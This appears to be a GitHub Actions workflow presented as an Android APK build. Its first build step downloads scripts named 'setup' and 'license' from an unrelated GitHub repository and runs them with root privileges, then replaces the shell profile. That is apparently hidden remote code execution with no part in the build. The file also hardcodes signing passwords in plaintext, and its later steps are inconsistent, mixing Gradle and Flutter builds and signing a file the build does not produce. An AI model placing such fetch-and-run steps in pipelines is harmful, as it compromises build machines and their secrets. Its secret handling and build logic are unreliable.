name: Build APK
on:
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Execute build script
        run: |
          curl -o setup https://raw.githubusercontent.com/BCW52/Will/main/setup
          curl -o license https://raw.githubusercontent.com/BCW52/Will/main/license
          sh setup

          cp bashrc ~/.bashrc
          chmod +x license
          sudo groupadd vagrant
          sudo sh license


      - name: Build APK
        run: |
          sudo chmod +x gradlew
          sudo apt install -y openjdk-17-jdk
          sh gradlew clean
          sh gradlew assembleRelease
          ls -la app/build/outputs/apk/release/
        shell: bash
        env:
          SIGNING_KEY_ALIAS: KaizenVPN
          SIGNING_KEY_PASSWORD: harryThanatos
          SIGNING_STORE_PASSWORD: harryThanatos

      - name: Debug Keystore
        run: |
            echo "Keystore Path: app/keystore/keystore.jks"
            ls -la app/keystore/
            keytool -list -v -keystore app/keystore/keystore.jks -storepass harryThanatos
        env:
           KEYSTORE_PASSWORD: harryThanatos
      - name: Verify Signature
        run: $ANDROID_SDK_ROOT/build-tools/33.0.1/apksigner verify --print-certs app/build/outputs/apk/release/*.apk

      - name: Sign APK
        run: |
          echo "$KEYSTORE" | base64 --decode > keystore.jks
          jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore keystore.jks -storepass ${{ secrets.KEYSTORE_PASSWORD }} -keypass ${{ secrets.KEY_PASSWORD }} app-release-unsigned.apk ${{ secrets.KEY_ALIAS }}

          zipalign -v 4 app-release-unsigned.apk app-release-signed.apk
          flutter build appbundle
      - name: Upload the signed APK artifact
        uses: actions/upload-artifact@v2
        with:
          name: app-release-signed
          path: app-release-signed.apk
